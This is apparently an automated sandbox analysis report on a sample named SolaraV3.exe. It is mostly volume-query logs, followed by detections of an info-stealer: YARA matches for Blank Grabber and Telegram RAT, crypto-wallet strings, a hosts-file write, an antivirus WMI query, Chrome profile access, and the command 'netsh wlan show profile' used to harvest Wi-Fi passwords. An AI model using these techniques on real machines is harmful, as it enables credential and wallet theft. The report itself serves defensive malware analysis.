Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC70D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00007FF6DC70D010

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC725E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

1_2_00007FF6DC725E7C

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EEB48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

110_2_00007FF74EEB48CC

Source: C:\Users\user\Desktop\SolaraV3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Desktop\SolaraV3.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxxz
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodusz
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: EthereumZ
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystoreZ

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
